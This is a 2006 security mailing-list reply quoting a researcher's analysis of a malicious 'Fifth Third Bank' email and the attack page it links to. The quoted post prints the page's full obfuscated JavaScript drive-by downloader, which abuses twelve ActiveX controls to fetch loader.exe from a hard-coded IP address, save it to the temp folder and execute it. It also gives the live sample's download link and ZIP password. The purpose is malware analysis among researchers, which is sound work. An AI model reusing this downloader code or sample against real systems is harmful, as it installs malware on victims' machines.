
RE: funsec Digest, Vol 15, Issue 45


From: "Randall M" <randallm () fidmail com>
Date: Fri, 17 Nov 2006 18:46:01 -0600

Thanks Larry. When I get home I'm going to run this in VMware -- in an isolated, snapshotted guest with no shared folders and no network path back to the host, since loader.exe is an unknown binary that only four scanners flagged.

Thank You 
Randall M  

===================== 

"You too can have your very own Computer!" 

Note: Side effects include: 
Blue screens; interrupt violation; 
illegal operations; remote code 
exploitations; virus and malware infestations; 
and other unknown vulnerabilities. 

 

[-----Original Message-----
[From: funsec-bounces () linuxbox org 
[[mailto:funsec-bounces () linuxbox org] On Behalf Of 
[funsec-request () linuxbox org
[Sent: Friday, November 17, 2006 1:53 PM
[To: funsec () linuxbox org
[Subject: funsec Digest, Vol 15, Issue 45
[
[
[Today's Topics:
[
[   1. Attack of the Day (Larry Seltzer)
[
[
[----------------------------------------------------------------------
[
[Message: 1
[Date: Fri, 17 Nov 2006 14:50:16 -0500
[From: Larry Seltzer <Larry () larryseltzer com>
[Subject: [funsec] Attack of the Day
[To: "FunSec [List]" <funsec () linuxbox org>
[Message-ID:
[       
[<0273B67044957C41BD71D12EBA2E00AE08C2AE@becca.LarrySeltzer.local>
[Content-Type: text/plain; charset="us-ascii"
[
[I got an interesting attack e-mail today. At first it looked 
[like a phish. This was the message:
[ 
[ From: estell esmaria [mailto:siselynevin () responsebase com]
[ Sent: Friday, November 17, 2006 12:11 PM
[ To: horatius augustine
[ Subject: Fifth Third Bank informs you
[ 
[ Hello again,
[ please visit: http://66.45.250.194/~turnoff/hi/
[ 
[And it had a cyan background. Not much of a presentation.
[ 
[I loaded the site in the body in my text editor (TextPad is 
[great for that, just file-open and give it the URL) and it's 
[not that long.
[There's a global string array with a list of GUIDs that I've 
[commented up. The full source for the page is below.
[ 
[ BD96C556-65A3-11D0-983A-00C04FC29E36 - RDS Data Control
[ AB9BCEDD-EC7E-47E1-9322-D4A210617116 - ObjectFactory Class
[ 0006F033-0000-0000-C000-000000000046 - Outlook Data Object
[ 0006F03A-0000-0000-C000-000000000046 - Outlook.Application
[ 6e32070a-766d-4ee6-879c-dc1fa91d2fc3 - MUWebControl Class  
[6414512B-B978-451D-A0D8-FCFDF33E833C - WUWebControl Class  
[7F5B7F63-F06F-4331-8A26-339E03C0AE3D - WMI Object Broker
[ 06723E09-F4C2-43c8-8358-09FCD1DB0766 - VsmIDE.DTE  
[639F725F-1B2D-4831-A9FD-874847682010 - DExplore Application 
[Object, DExplore.AppObj.8.0
[ BA018599-1DB3-44f9-83B4-461454C84BF8 - Microsoft Visual 
[Studio DTE Object, VisualStudio.DTE.8.0
[ D0C07D56-7C69-43F1-B4A0-25F5A11FAB19 - Microsoft DbgClr DTE 
[Object, Microsoft.DbgClr.DTE.8.0  
[E8CCCDDF-CA28-496b-B050-6C07C962476B - VsaIDE.DTE
[ 
[I guess this is one of the exploits for the Microsoft XMLHTTP
[bug they just patched, although nothing in the page attacks
[XMLHTTP itself. It loops through each of these GUIDs, creates the
[control as an object element, and then uses that control's
[CreateObject/GetObject to hand back Microsoft.XMLHTTP, an
[ADODB.Stream, a Scripting.FileSystemObject and Shell.Application.
[XMLHTTP fetches http://66.45.250.194/~turnoff/hi/loader.exe, the
[stream writes the response body under a random name in the temp
[folder (GetSpecialFolder(2)), and ShellExecute runs it. So the
[payload is a dropped executable rather than shellcode, and the
[weakness being abused is presumably whichever of these twelve
[controls still exposes CreateObject to a web page on an
[unpatched machine.
[ 
[I got the file and ran it through VirusTotal. Only four
[engines said anything at all:
[
[AntiVir      7.2.0.39   11.17.2006  HEUR/Crypted
[BitDefender  7.2        11.17.2006  Generic.Malware.Sdldg.10CF2C7A
[eSafe        7.0.14.0   11.16.2006  suspicious Trojan/Worm
[Fortinet     2.82.0.0   11.17.2006  suspicious
[ 
[Hooray for Antivir, the only one with something useful to say. 
[Here's Antivir's writeup on HEUR/Crypted:
[http://www.avira.com/en/threats/section/fulldetails/id_vir/2704/heur_crypted.html
[ 
[I've attached the file in a ZIP file with the password 'loader'
[ 
[LJS
[ 
[------------------------------------------------------
[ 
[[[!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
["http://www.w3.org/TR/html4/strict.dtd";]]
[[[html]][[head]][[title]]Google[[/title]]
[[[script type="text/javascript" language="javascript"]]
[ 
[var obj_t = new Array(
[  'BD96C556-65A3-11D0-983A-00C04FC29E36',
[  'AB9BCEDD-EC7E-47E1-9322-D4A210617116',
[  '0006F033-0000-0000-C000-000000000046',
[  '0006F03A-0000-0000-C000-000000000046',
[  '6e32070a-766d-4ee6-879c-dc1fa91d2fc3',
[  '6414512B-B978-451D-A0D8-FCFDF33E833C',
[  '7F5B7F63-F06F-4331-8A26-339E03C0AE3D',
[  '06723E09-F4C2-43c8-8358-09FCD1DB0766',
[  '639F725F-1B2D-4831-A9FD-874847682010',
[  'BA018599-1DB3-44f9-83B4-461454C84BF8',
[  'D0C07D56-7C69-43F1-B4A0-25F5A11FAB19',
[  'E8CCCDDF-CA28-496b-B050-6C07C962476B');
[ 
[function CreateO(o, n) {
[  var r = null;
[  try { eval('r = o.CreateObject(n)') }catch(e){}
[  if (! r) {
[    try { eval('r = o.CreateObject(n, "")') }catch(e){}
[  }
[  if (! r) {
[    try { eval('r = o.CreateObject(n, "", "")') }catch(e){}
[  }
[  if (! r) {
[    try { eval('r = o.GetObject("", n)') }catch(e){}
[  }
[  if (! r) {
[    try { eval('r = o.GetObject(n, "")') }catch(e){}
[  }
[  if (! r) {
[    try { eval('r = o.GetObject(n)') }catch(e){}
[  }
[  return(r);
[}
[ 
[function iii() {
[  return true;
[}
[ 
[
[var iss = false;
[uri = 'http://66.45.250.194/~turnoff/hi/loader.exe&apos;;
[window.onerror = iii;
[var za = 'ting.FileS';
[var z = 'plication';
[var shellapp = 'Shell.Ap'+z;
[var z01 = "r%20%3D%20o.Creat'+'eObject%'+'28n%29";
[var z02 = "r%20%3D%20o.Creat'+'eObject%28n%'+'2C%20%22%22%29";
[var z03 =
["r%20%3D%20o.Create'+'Object%28n%2C'+'%20%22%22%2C%20%22%22%29";
[var z04 = "r%20%3D%20o.GetOb'+'ject%28%'+'22%22%2C%20n%29";
[var z05 = "r%20%3D%20o.GetObject%28n%'+'2C%20%22%22%29";
[var z06 = "r%20%3D%2'+'0o.GetObject%28n%29";
[ 
[var a1 = 'ADO';
[var a2 = 'DB.';
[var a3 = 'Str';
[var a4 = 'eam';
[ 
[function rname() {
[  var chars =
["0123456789ABCDEFGHIJKLMNOPQRSTUVWXTZabcdefghiklmnopqrstuvwxyz";
[  var string_length = 8;
[  var randomstring = '';
[  for (var i=0; i[[string_length; i++) {
[    var rnum = Math.floor(Math.random() * chars.length);
[    randomstring += chars.substring(rnum,rnum+1);
[  }
[ 
[  return randomstring + '.com';
[}
[ 
[function DoIt()
[{ 
[ 
[  x.Open('GET',uri + '?e=' + escape(rname()),false);
[  x.Send();
[  var fname1 = rname();
[ 
[  var f = xml.CreateObject('Scrip'+za+'ystemObject','');
[ 
[  var tmp = f.GetSpecialFolder(2);
[ 
[
[  fname1 = f.BuildPath(tmp,fname1);
[ 
[  S.open();
[  S.write(x.responseBody);
[  S.savetofile(fname1,2);
[  S.close();
[  var Q = xml.createobject(shellapp,'');
[  Q.ShellExecute(fname1,'','','open',0);
[}
[ 
[
[[[/script]][[/head]][[body]]
[ 
[
[[[script type="text/javascript" language="JavaScript"]] if 
[(navigator.userAgent.indexOf('MSIE') != -1) {
[  var ni = 0;
[  while (obj_t[ni]) {
[    var xml = null;
[    var xml = document.createElement('object');
[    guid = obj_t[ni];
[    xml.setAttribute('classid','clsid:'+guid);
[ 
[    if (xml) {
[      n_xml = 'Microsoft.XMLHTTP';
[                        try { 
[        var x = null;
[        
[        var x = CreateO(xml,n_xml);
[ 
[        if (x) {
[          str1 = a1 + a2;
[          str1 = str1 + a3 + a4;
[          str5 = str1;
[          var S = xml.CreateObject(str5,"");
[          S.type = 1;
[          str6 = 'GET';
[          DoIt();
[        }
[ 
[      } catch(e){}
[    }
[ 
[    ni++;
[  }
[}
[[[/script]]
[[[/body]][[/html]]
[-------------- next part --------------
[A non-text attachment was scrubbed...
[Name: loader.zip
[Type: application/x-zip-compressed
[Size: 19607 bytes
[Desc: loader.zip
[Url : 
[http://linuxbox.org/pipermail/funsec/attachments/20061117/d4e77e05/loader.bin
[(Note: this is the password-protected ZIP of loader.exe, a live
[sample; fetch it only into an isolated analysis environment.)
[
[------------------------------
[


